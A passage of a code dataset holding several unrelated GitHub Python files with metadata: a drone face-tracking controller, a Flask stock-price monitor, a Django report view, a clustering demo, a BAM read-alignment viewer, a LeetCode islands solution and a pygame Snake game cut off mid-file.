:param pid: pid controller parameters\n :param dist: distance from where we want to be and where we are camerawise\n :return: the instructions for drone movement\n '''\n\n #Calculate the velocities based on error values and PID\n error_x = result[0][0] - w // 2\n spd_x = PID[0] * error_x + PID[1] * (error_x - pError_x)\n spd_x = np.clip(spd_x, -100, 100)\n\n error_y = h//2 - result[0][1]\n spd_y = PID[0] * error_y + PID[1] * (error_y - pError_y)\n spd_y = np.clip(spd_y, -100, 100)\n spd_x, spd_y = int(spd_x), int(spd_y)\n\n #Display the data on the frame\n frm = dataDisplay(frm, error_x, error_y, spd_x, spd_y, PID)\n\n\n #print(f'X SPD: {spd_x}, Y SPD: {spd_y}')\n\n #Send the values to the tello flight control\n if result[0][0] != 0 or result[0][1] != 0:\n dronik.yaw_velocity = int(spd_x)\n dronik.up_down_velocity = int(spd_y)\n else:\n dronik.for_back_velocity = 0\n dronik.left_right_velocity = 0\n dronik.up_down_velocity = 0\n dronik.yaw_velocity = 0\n error_x = 0\n error_y = 0\n\n if dronik.send_rc_control:\n dronik.send_rc_control(dronik.left_right_velocity,dronik.for_back_velocity, dronik.up_down_velocity,\n dronik.yaw_velocity)\n\n\n return error_x, error_y, frm\n", "repo_name": "rskrobotics/face-tracking-drone", "sub_path": "AuxillaryFunctions.py", "file_name": "AuxillaryFunctions.py", "file_ext": "py", "file_size_in_byte": 3834, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "djitellopy.Tello", "line_number": 13, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 41, "usage_type": "call"}, {"api_name": "cv2.CascadeClassifier", "line_number": 51, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 52, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 52, "usage_type": "attribute"}, {"api_name": "cv2.rectangle", "line_number": 58, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 70, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 71, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 72, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 73, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 74, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 75, "usage_type": "attribute"}, {"api_name": "numpy.clip", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.clip", "line_number": 97, "usage_type": "call"}]} +{"seq_id": "30939235382", "text": "import math\nimport sys\n\nfrom app import create_app\nfrom flask_socketio import SocketIO\nfrom flask_script import Manager,Shell\nfrom dependency.util import Server\nfrom app.realtimemonitor.scan_zdt import get_zg_code\nimport tushare as ts\n\nasync_mode = \"threading\"\n\napp = create_app('default')\n\n# 打开调试功能\n# manager.add_command('runserver',Server(use_debugger=True))\nsocketio = SocketIO(app, async_mode=async_mode)\nsocketio.init_app(app, cors_allowed_origins='*')\n\n@socketio.on('start_monitor',namespace='/test')\ndef test_message():\n print('receive')\n # print(message)\n # 定时任务\n zg_code_dict = get_zg_code()\n code_list = list(zg_code_dict.keys())\n conn=ts.get_apis()\n\n each_batch = math.ceil(len(code_list)/5)\n # 分批 3批\n while 1:\n\n for i in range(5):\n code_list_=code_list[i*each_batch:each_batch*(i+1)]\n\n try:\n df = ts.quotes(code_list_,conn=conn)\n except Exception as e:\n socketio.sleep(10)\n continue\n\n df=df[['code','price','last_close']]\n df['percent']=df.apply(lambda row:round((row['price']-row['last_close'])/row['last_close']*100,2),axis=1)\n df=df[(df['percent']>8) | (df['percent']<-8)]\n df=df.sort_values(by='percent')\n df['name']=df['code'].map(lambda x:zg_code_dict.get(x))\n\n if len(df)>0:\n result=df.to_dict(orient='records')\n print('send---')\n # print(result)\n # for item in result:\n\n socketio.emit('start_response', {'data':result,'num':i+1},namespace=\"/test\")\n\n # socketio.sleep(60)\n\n\n@socketio.on('stop_monitor',namespace='/test')\ndef test_message():\n print('receive')\n # print(message)\n socketio.emit('stop_response',{'data':'nihao'} ,namespace=\"/test\")\n\nmanager = Manager(app)\n\n\ndef make_shell_context():\n return dict(app=app)\n\nmanager.add_command('shell',Shell(make_context=make_shell_context))\nserver=Server()\nserver.get_socket(socketio)\nmanager.add_command(\"runserver\", server)\n\nif __name__=='__main__':\n # socketio.run(app)\n manager.run()\n", "repo_name": "Rockyzsu/StockManagement", "sub_path": "manage.py", "file_name": "manage.py", "file_ext": "py", "file_size_in_byte": 2162, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 8, "dataset": "github-code", "pt": "53", "api": [{"api_name": "app.create_app", "line_number": 13, "usage_type": "call"}, {"api_name": "flask_socketio.SocketIO", "line_number": 17, "usage_type": "call"}, {"api_name": "app.realtimemonitor.scan_zdt.get_zg_code", "line_number": 25, "usage_type": "call"}, {"api_name": "tushare.get_apis", "line_number": 27, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 29, "usage_type": "call"}, {"api_name": "tushare.quotes", "line_number": 37, "usage_type": "call"}, {"api_name": "flask_script.Manager", "line_number": 65, "usage_type": "call"}, {"api_name": "flask_script.Shell", "line_number": 71, "usage_type": "call"}, {"api_name": "dependency.util.Server", "line_number": 72, "usage_type": "call"}]} +{"seq_id": "20557123959", "text": "from django.contrib.auth.models import User\nfrom django.db.models import Count\nfrom django.db.models.functions import TruncMonth, TruncYear\n\nfrom reports.views.base_report_template import BaseReportTemplateView\n\n\nclass UserRegistrationsView(BaseReportTemplateView):\n\n template_name = 'reports/user_registrations.html'\n\n def get_graph_data(self, start_date, end_date):\n\n user_registrations = User.objects\\\n .filter(date_joined__gte=start_date, date_joined__lte=end_date) \\\n .exclude(pk__in=self.users_filter_by) \\\n .annotate(month=TruncMonth('date_joined'),\n year=TruncYear('date_joined')) \\\n .values('month', 'year') \\\n .annotate(count=Count('id')) \\\n .order_by('year', 'month')\n\n previous_user_registrations = User.objects.filter(date_joined__lt=start_date).count()\n\n return {\n 'user_registrations': user_registrations,\n 'previous_user_registrations': previous_user_registrations\n }\n", "repo_name": "DigitalCampus/django-oppia", "sub_path": "reports/views/user_registrations.py", "file_name": "user_registrations.py", "file_ext": "py", "file_size_in_byte": 1027, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 17, "dataset": "github-code", "pt": "53", "api": [{"api_name": "reports.views.base_report_template.BaseReportTemplateView", "line_number": 8, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User.objects.filter", "line_number": 14, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 14, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 14, "usage_type": "name"}, {"api_name": "django.db.models.functions.TruncMonth", "line_number": 17, "usage_type": "call"}, {"api_name": "django.db.models.functions.TruncYear", "line_number": 18, "usage_type": "call"}, {"api_name": "django.db.models.Count", "line_number": 20, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects.filter", "line_number": 23, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 23, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 23, "usage_type": "name"}]} +{"seq_id": "4568030205", "text": "import matplotlib.pyplot as plt\nfrom sklearn import datasets\nimport numpy as np\n\n#Toy data sets\ncenters_neat = [(-10, 10), (0, -5), (10, 5)]\nx_neat, _ = datasets.make_blobs(n_samples=5000, \n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tcenters=centers_neat,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tcluster_std=2,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\trandom_state=2)\n\nx_messy, _ = datasets.make_classification(n_samples=5000,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tn_features=10,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tn_classes=3,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tn_clusters_per_class=1,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tclass_sep=1.5,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tshuffle=False,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\trandom_state=301)\n#Default plot params\nplt.style.use('seaborn')\ncmap = 'tab10'\n\n# plt.figure(figsize=(17,8))\n# plt.subplot(121, title='\"Neat\" Clusters')\n# plt.scatter(x_neat[:,0], x_neat[:,1])\n# plt.subplot(122, title='\"Messy\" Clusters')\n# plt.scatter(x_messy[:,0], x_messy[:,1])\n# plt.show()\n\n# \nfrom sklearn.cluster import KMeans\n\n#Predict K-Means cluster membership\nkm_neat = KMeans(n_clusters=3, random_state=2).fit_predict(x_neat)\nkm_messy = KMeans(n_clusters=3, random_state=2).fit_predict(x_messy)\n\n# plt.figure(figsize=(15,8))\n# plt.subplot(121, title='\"Neat\" K-Means')\n# plt.scatter(x_neat[:,0], x_neat[:,1], c=km_neat, cmap=cmap)\n# plt.subplot(122, title='\"Messy\" K-Means')\n# plt.scatter(x_messy[:,0], x_messy[:,1], c=km_messy, cmap=cmap)\n# plt.show()\n\n\nfrom sklearn.mixture import GaussianMixture\n\n#Predict GMM cluster membership\ngm_messy = GaussianMixture(n_components=3).fit(x_messy).predict(x_messy)\n\n# plt.figure(figsize=(15,8))\n# plt.subplot(121, title='\"Messy\" K-Means')\n# plt.scatter(x_messy[:,0], x_messy[:,1], c=km_messy, cmap=cmap)\n# plt.subplot(122, title='\"Messy\" GMM')\n# plt.scatter(x_messy[:,0], x_messy[:,1], c=gm_messy, cmap=cmap)\n# plt.show()\n\nimport hdbscan\n\n\n #Toy data set\nblob1, y1 = datasets.make_blobs(n_samples=25, \n centers=[(10,5)],\n cluster_std=1.5,\n random_state=2)\n\nblob2, y2 = datasets.make_blobs(n_samples=500, \n centers=[(6,2)],\n cluster_std=1.3,\n random_state=2)\n\nblob3, y3 = datasets.make_blobs(n_samples=500, \n centers=[(2,5)],\n cluster_std=1,\n random_state=2)\n\nunbal = np.vstack([blob1, blob2, blob3])\ny1[y1 == 0] = 0\ny2[y2 == 0] = 1\ny3[y3 == 0] = 2\nlabs = np.concatenate([y1, y2, y3])\n\n#Predict K-Means cluster membership\nkm_unbal = KMeans(n_clusters=3, random_state=2).fit(unbal)\nkm_unbal_preds = KMeans(n_clusters=3, random_state=2).fit_predict(unbal)\n\nplt.figure(figsize=(15,8))\nplt.subplot(121, title='Generated Clusters and Assignments')\nplt.scatter(unbal[:,0], unbal[:,1], c=labs, cmap=cmap)\nplt.subplot(122, title='K-Means w/ Cluster Assignments and Centers')\nplt.scatter(unbal[:,0], unbal[:,1], c=km_unbal_preds, cmap=cmap)\nplt.scatter(km_unbal.cluster_centers_[:,0], km_unbal.cluster_centers_[:,1], marker='X', s=150, c='black')\n\n\n\n\nclust_count = np.linspace(1, 20, num=20, dtype='int')\n\nclust_number = 2\nplot_number = 1\nplt.figure (figsize=(17,12))\nwhile clust_number < 21:\n hdb = hdbscan.HDBSCAN(min_cluster_size=clust_number)\n hdb_pred = hdb.fit(unbal)\n plt.subplot(5, 4, plot_number, title = 'Min. Cluster Size = {}'.format(clust_number))\n plt.scatter(unbal[:,0], unbal[:,1], c=hdb_pred.labels_, cmap=cmap)\n plot_number += 1\n clust_number += 1\n \nplt.tight_layout()\nplt.show()", "repo_name": "AghilasSini/AT-Annotator", "sub_path": "features_extractions/when_kmean_fail.py", "file_name": "when_kmean_fail.py", "file_ext": "py", "file_size_in_byte": 3488, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sklearn.datasets.make_blobs", "line_number": 7, "usage_type": "call"}, {"api_name": "sklearn.datasets", "line_number": 7, "usage_type": "name"}, {"api_name": "sklearn.datasets.make_classification", "line_number": 12, "usage_type": "call"}, {"api_name": "sklearn.datasets", "line_number": 12, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.style.use", "line_number": 20, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.style", "line_number": 20, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 20, "usage_type": "name"}, {"api_name": "sklearn.cluster.KMeans", "line_number": 34, "usage_type": "call"}, {"api_name": "sklearn.cluster.KMeans", "line_number": 35, "usage_type": "call"}, {"api_name": "sklearn.mixture.GaussianMixture", "line_number": 48, "usage_type": "call"}, {"api_name": "sklearn.datasets.make_blobs", "line_number": 61, "usage_type": "call"}, {"api_name": "sklearn.datasets", "line_number": 61, "usage_type": "name"}, {"api_name": "sklearn.datasets.make_blobs", "line_number": 66, "usage_type": "call"}, {"api_name": "sklearn.datasets", "line_number": 66, "usage_type": "name"}, {"api_name": "sklearn.datasets.make_blobs", "line_number": 71, "usage_type": "call"}, {"api_name": "sklearn.datasets", "line_number": 71, "usage_type": "name"}, {"api_name": "numpy.vstack", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 80, "usage_type": "call"}, {"api_name": "sklearn.cluster.KMeans", "line_number": 83, "usage_type": "call"}, {"api_name": "sklearn.cluster.KMeans", "line_number": 84, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 86, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 86, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 87, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 87, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 88, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 88, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 89, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 89, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 90, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 90, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 91, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 91, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 96, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 100, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 100, "usage_type": "name"}, {"api_name": "hdbscan.HDBSCAN", "line_number": 102, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 104, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 104, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 105, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 105, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 109, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 109, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 110, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 110, "usage_type": "name"}]} +{"seq_id": "31492605997", "text": "from Bio import SeqIO\r\nfrom Bio import Seq\r\nimport pysam\r\nfrom colorama import Fore, Style\r\n\r\nbam_input_file = '../test_data/3e25dd86-256f-4b4a-bd54-8d8e83d47e37_gdc_realn_rehead.Aligned.sortedByCoord.out.bam'\r\n\r\nfasta_input_file = '../fasta/Homo_sapiens_L1.L1HS.fa'\r\n\r\nfasta_sequences = SeqIO.parse(open(fasta_input_file),'fasta')\r\n\r\nl1_seq = None\r\n\r\nfor fasta in fasta_sequences:\r\n l1_seq = str(fasta.seq)\r\n\r\nsamfile = pysam.AlignmentFile(bam_input_file, \"rb\")\r\n\r\n# ┌┐└┘├┤┬┴┼─│\r\n\r\ndef print_grid(grid, reference):\r\n totals = [x['A'] + x['C'] + x['G'] + x['T'] for x in grid]\r\n grid = [\r\n {\r\n 'A': x['A']/totals[i],\r\n 'C': x['C']/totals[i],\r\n 'G': x['G']/totals[i],\r\n 'T': x['T']/totals[i]\r\n } for i, x in enumerate(grid)]\r\n # print('┌───────────┬' + '─────┬'*len(reference[:-1]) + '─────┐')\r\n # print('│ Reference │' + '│'.join([' {} '.format(x) for x in reference]) + '│')\r\n # print('├───────────┼' + '─────┼'*len(reference[:-1]) + '─────┤')\r\n # print('│ A │' + '│'.join(['{:>4.0%} '.format(x['A']) for x in grid]) + '│')\r\n # print('├───────────┼' + '─────┼'*len(reference[:-1]) + '─────┤')\r\n # print('│ C │' + '│'.join(['{:>4.0%} '.format(x['C']) for x in grid]) + '│')\r\n # print('├───────────┼' + '─────┼'*len(reference[:-1]) + '─────┤')\r\n # print('│ G │' + '│'.join(['{:>4.0%} '.format(x['G']) for x in grid]) + '│')\r\n # print('├───────────┼' + '─────┼'*len(reference[:-1]) + '─────┤')\r\n # print('│ T │' + '│'.join(['{:>4.0%} '.format(x['T']) for x in grid]) + '│')\r\n # print('└───────────┴' + '─────┴'*len(reference[:-1]) + '─────┘')\r\n tmp_string = ''\r\n tmp_string += '┌───────────┬' + '─────┬'*len(reference[:-1]) + '─────┐\\n'\r\n tmp_string += '│ Reference │' + '│'.join([' {} '.format(x) for x in reference]) + '│\\n'\r\n tmp_string += '├───────────┼' + '─────┼'*len(reference[:-1]) + '─────┤\\n'\r\n tmp_string += '│ A │' + '│'.join(['{:>4.0%} '.format(x['A']) for x in grid]) + '│\\n'\r\n tmp_string += '├───────────┼' + '─────┼'*len(reference[:-1]) + '─────┤\\n'\r\n tmp_string += '│ C │' + '│'.join(['{:>4.0%} '.format(x['C']) for x in grid]) + '│\\n'\r\n tmp_string += '├───────────┼' + '─────┼'*len(reference[:-1]) + '─────┤\\n'\r\n tmp_string += '│ G │' + '│'.join(['{:>4.0%} '.format(x['G']) for x in grid]) + '│\\n'\r\n tmp_string += '├───────────┼' + '─────┼'*len(reference[:-1]) + '─────┤\\n'\r\n tmp_string += '│ T │' + '│'.join(['{:>4.0%} '.format(x['T']) for x in grid]) + '│\\n'\r\n tmp_string += '└───────────┴' + '─────┴'*len(reference[:-1]) + '─────┘\\n'\r\n return tmp_string\r\n\r\ndef compare_reads(start_pos, seqlength):\r\n start_pos -= 1\r\n bam_reads = []\r\n samfile.reset()\r\n grid = [{'A': 0, 'C': 0, 'G': 0, 'T': 0} for x in range(seqlength)]\r\n print('grid len {}'.format(len(grid)))\r\n print('seq len {}'.format(seqlength))\r\n matched_reads = 0\r\n other_reads = 0\r\n counter = 0\r\n mismatch_seq = []\r\n for read in samfile.fetch():\r\n\r\n start_offset = start_pos - 1\r\n ref_s = read.reference_start - read.query_alignment_start\r\n ref_e = ref_s + read.query_length\r\n\r\n if start_offset - 50 < ref_s <= start_offset + seqlength:\r\n counter += 1\r\n read_str = ''\r\n cigar = read.cigartuples\r\n start = read.reference_start - start_offset\r\n seq = read.query_sequence\r\n if cigar[0][0] == 4:\r\n start -= cigar[0][1]\r\n index = 0\r\n len_so_far = 0\r\n\r\n ref_seq = l1_seq[start_pos:start_pos + seqlength].upper()\r\n r_match = ref_seq[:max(start_pos, ref_s) - start_pos] + seq[max(start_pos, ref_s) - ref_s:start_pos + seqlength - ref_s] + ref_seq[len(ref_seq) - (start_pos + seqlength - min(start_pos + seqlength, ref_e)):]\r\n # print(\r\n # 'seq :',\r\n # '.'*(max(start_pos, ref_s) - start_pos) + \\\r\n # seq[max(start_pos, ref_s) - ref_s:start_pos + seqlength - ref_s] + \\\r\n # '.'*(start_pos + seqlength - min(start_pos + seqlength, ref_e))\r\n # ,\r\n # max(start_pos, ref_s) - start_pos,\r\n # start_pos + seqlength - min(start_pos + seqlength, ref_e)\r\n # )\r\n if r_match != ref_seq:\r\n mismatch_seq.append(Seq.translate(r_match))\r\n other_reads += 1\r\n else:\r\n matched_reads += 1\r\n print(mismatch_seq)\r\n # for seq in mismatch_seq:\r\n # print(Seq.translate(seq))\r\n print('Total: {}; Matched: {}; Mismatched: {}'.format(counter, matched_reads, other_reads))\r\n print('-'*100)\r\n\r\n\r\n\r\ndef print_reads(start_pos, seqlength):\r\n bam_reads = []\r\n samfile.reset()\r\n grid = [{'A': 0, 'C': 0, 'G': 0, 'T': 0} for x in range(seqlength)]\r\n print('grid len {}'.format(len(grid)))\r\n print('seq len {}'.format(seqlength))\r\n for read in samfile.fetch():\r\n start_offset = start_pos - 1\r\n\r\n if start_offset - 50 < read.reference_start <= start_offset + seqlength:\r\n read_str = ''\r\n cigar = read.cigartuples\r\n start = read.reference_start - start_offset\r\n seq = read.seq\r\n if cigar[0][0] == 4:\r\n start -= cigar[0][1]\r\n index = 0\r\n len_so_far = 0\r\n for type, length in cigar:\r\n if type == 0:\r\n for c_idx in range(length):\r\n if start_offset <= len_so_far + c_idx + read.reference_start < start_offset + seqlength:\r\n try:\r\n grid[len_so_far + c_idx + read.reference_start - start_offset][seq[c_idx].upper()] += 1\r\n except:\r\n print('error {}'.format(len_so_far + c_idx + read.reference_start - start_offset))\r\n print('grid_len {}'.format(len(grid)))\r\n\r\n # grid[index] += 1\r\n # index += 1\r\n read_str += Fore.GREEN\r\n elif type == 1:\r\n read_str += Fore.BLUE\r\n elif type == 2:\r\n read_str += Fore.MAGENTA\r\n seq = '-'*length + seq\r\n print(cigar)\r\n elif type == 3:\r\n read_str += Fore.YELLOW\r\n elif type == 4:\r\n read_str += Fore.RED\r\n elif type == 5:\r\n read_str += Fore.WHITE\r\n elif type == 6:\r\n read_str += Fore.WHITE\r\n elif type == 7:\r\n read_str += Fore.WHITE\r\n elif type == 8:\r\n read_str += Fore.WHITE\r\n read_str += seq[0:length]\r\n seq = seq[length:]\r\n len_so_far += length\r\n\r\n read_str += Fore.WHITE\r\n bam_reads.append((start, read_str))\r\n # return print_grid(grid, l1_seq[start_offset:start_offset + seqlength].upper())\r\n# samfile.close()\r\n # bam_reads.sort(key=lambda x: x[0])\r\n print('\\n\\n\\n\\n\\n')\r\n for read in bam_reads:\r\n print('.'*(50+read[0]) + '{}'.format(read[1]))\r\n print(Style.RESET_ALL + '-'*120)\r\n print('-'*0 + '{}'.format(Fore.WHITE + l1_seq[start_offset - 50: start_offset] + Fore.GREEN + l1_seq[start_offset:start_offset + seqlength].upper() + Fore.WHITE + l1_seq[start_offset+seqlength:start_offset+seqlength + 20]))\r\n\r\n\r\n# M\tBAM_CMATCH\t0\r\n# I\tBAM_CINS\t1\r\n# D\tBAM_CDEL\t2\r\n# N\tBAM_CREF_SKIP\t3\r\n# S\tBAM_CSOFT_CLIP\t4\r\n# H\tBAM_CHARD_CLIP\t5\r\n# P\tBAM_CPAD\t6\r\n# =\tBAM_CEQUAL\t7\r\n# X\tBAM_CDIFF\t8\r\n# B\tBAM_CBACK\t9\r\n\r\n\r\nif __name__ in \"__main__\":\r\n print_reads(2621, 20)\r\n", "repo_name": "MarkGrivainis/2018_xuya_peptides", "sub_path": "scripts/alignment_test.py", "file_name": "alignment_test.py", "file_ext": "py", "file_size_in_byte": 8610, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "Bio.SeqIO.parse", "line_number": 10, "usage_type": "call"}, {"api_name": "Bio.SeqIO", "line_number": 10, "usage_type": "name"}, {"api_name": "pysam.AlignmentFile", "line_number": 17, "usage_type": "call"}, {"api_name": "Bio.Seq.translate", "line_number": 95, "usage_type": "call"}, {"api_name": "Bio.Seq", "line_number": 95, "usage_type": "name"}, {"api_name": "colorama.Fore.GREEN", "line_number": 137, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 137, "usage_type": "name"}, {"api_name": "colorama.Fore.BLUE", "line_number": 139, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 139, "usage_type": "name"}, {"api_name": "colorama.Fore.MAGENTA", "line_number": 141, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 141, "usage_type": "name"}, {"api_name": "colorama.Fore.YELLOW", "line_number": 145, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 145, "usage_type": "name"}, {"api_name": "colorama.Fore.RED", "line_number": 147, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 147, "usage_type": "name"}, {"api_name": "colorama.Fore.WHITE", "line_number": 149, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 149, "usage_type": "name"}, {"api_name": "colorama.Fore.WHITE", "line_number": 151, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 151, "usage_type": "name"}, {"api_name": "colorama.Fore.WHITE", "line_number": 153, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 153, "usage_type": "name"}, {"api_name": "colorama.Fore.WHITE", "line_number": 155, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 155, "usage_type": "name"}, {"api_name": "colorama.Fore.WHITE", "line_number": 160, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 160, "usage_type": "name"}, {"api_name": "colorama.Style.RESET_ALL", "line_number": 168, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 168, "usage_type": "name"}, {"api_name": "colorama.Fore.WHITE", "line_number": 169, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 169, "usage_type": "name"}, {"api_name": "colorama.Fore.GREEN", "line_number": 169, "usage_type": "attribute"}]} +{"seq_id": "35448334494", "text": "# -*- coding: utf-8 -*-\n\"\"\"\n200. 岛屿数量\n给你一个由 '1'(陆地)和 '0'(水)组成的的二维网格,请你计算网格中岛屿的数量。\n\n岛屿总是被水包围,并且每座岛屿只能由水平方向或竖直方向上相邻的陆地连接形成。\n\n此外,你可以假设该网格的四条边均被水包围。\n\n\n\n示例 1:\n\n输入:\n[\n['1','1','1','1','0'],\n['1','1','0','1','0'],\n['1','1','0','0','0'],\n['0','0','0','0','0']\n]\n输出: 1\n示例 2:\n\n输入:\n[\n['1','1','0','0','0'],\n['1','1','0','0','0'],\n['0','0','1','0','0'],\n['0','0','0','1','1']\n]\n输出: 3\n解释: 每座岛屿只能由水平和/或竖直方向上相邻的陆地连接而成。\n\"\"\"\nimport collections\nfrom typing import List\n\n\nclass Solution:\n def numIslands(self, grid: List[List[str]]) -> int:\n \"\"\"\n 广度优先搜索\n 时间复杂度:O(MN),其中 M 和 N 分别为行数和列数。\n\n 空间复杂度:O(min(M,N)),在最坏情况下,整个网格均为陆地,队列的大小可以达到 min(M,N)。\n :param grid:\n :return:\n \"\"\"\n nr = len(grid)\n if nr == 0:\n return 0\n nc = len(grid[0])\n\n num_islands = 0\n for r in range(nr):\n for c in range(nc):\n if grid[r][c] == \"1\":\n num_islands += 1\n grid[r][c] = \"0\"\n neighbors = collections.deque([(r, c)])\n while neighbors:\n row, col = neighbors.popleft()\n for x, y in [(row - 1, col), (row + 1, col), (row, col - 1), (row, col + 1)]:\n if 0 <= x < nr and 0 <= y < nc and grid[x][y] == \"1\":\n neighbors.append((x, y))\n grid[x][y] = \"0\"\n\n return num_islands\n\n\nif __name__ == '__main__':\n grid = [\n ['1', '1', '0', '0', '0'],\n ['1', '1', '0', '0', '0'],\n ['0', '0', '1', '0', '0'],\n ['0', '0', '0', '1', '1']\n ]\n\n solution = Solution()\n print(solution.numIslands(grid))\n", "repo_name": "MaoningGuan/LeetCode", "sub_path": "软件开发岗刷题(华为笔试准备)/队列和栈/numIslands_2.py", "file_name": "numIslands_2.py", "file_ext": "py", "file_size_in_byte": 2104, "program_lang": "python", "lang": "zh", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "53", "api": [{"api_name": "typing.List", "line_number": 39, "usage_type": "name"}, {"api_name": "collections.deque", "line_number": 59, "usage_type": "call"}]} +{"seq_id": "74834099049", "text": "import pygame as pg\nfrom random import randrange\n\n# Variables Globales\nWINDOW = 500\nTILE_SIZE = 25\nRANGE = (TILE_SIZE // 2, WINDOW - TILE_SIZE // 2, TILE_SIZE)\nget_random_position = lambda: [randrange(*RANGE), randrange(*RANGE)]# funcion para obtener una posicion aleatoria\nsnake = pg.rect.Rect([0, 0, TILE_SIZE - 2, TILE_SIZE - 2])# INSTANCIA DE LA CLASE RECT sera la cabeza de la serpiente\nsnake.center = get_random_position()\nlength = 1\nsnake_body_segments = [snake.copy()]\nsnake_direction = (0, 0)\ntime, time_steps = 0, 110 #time es el tiempo actual y time_steps es el tiempo que tarda en moverse la serpiente\nfood = snake.copy()\nfood.center = get_random_position() \nscreen = pg.display.set_mode([WINDOW] * 2)\nclock = pg.time.Clock()# frame rate\n\n# loop principal\nwhile True:\n for event in pg.event.get():\n if event.type == pg.QUIT:\n exit()\n if event.type == pg.KEYDOWN:\n if event.key == pg.K_UP:\n snake_direction = (0, -TILE_SIZE)\n if event.key == pg.K_DOWN:\n snake_direction = (0, TILE_SIZE)\n if event.key == pg.K_LEFT:\n snake_direction = (-TILE_SIZE, 0)\n if event.key == pg.K_RIGHT:\n snake_direction = (TILE_SIZE, 0)\n screen.fill('black')\n pg.draw.rect(screen, 'red', food)\n if snake.colliderect(food):# si la serpiente choca con la comida\n length += 1\n food.center = get_random_position()\n if snake.left < 0 or snake.right > WINDOW or snake.top < 0 or snake.bottom > WINDOW:# si la serpiente choca con los bordes\n snake.center = get_random_position()\n length = 1\n snake_body_segments = [snake.copy()]\n food.center = get_random_position()\n if any(segment.center == snake.center for segment in snake_body_segments[:-1]):# si la serpiente choca con su cuerpo\n snake.center = get_random_position()\n length = 1\n snake_body_segments = [snake.copy()]\n food.center = get_random_position()\n [pg.draw.rect(screen, 'green', segment) for segment in snake_body_segments]\n time_now = pg.time.get_ticks()\n if time_now - time > time_steps:# si el tiempo actual menos el tiempo anterior es mayor al tiempo que 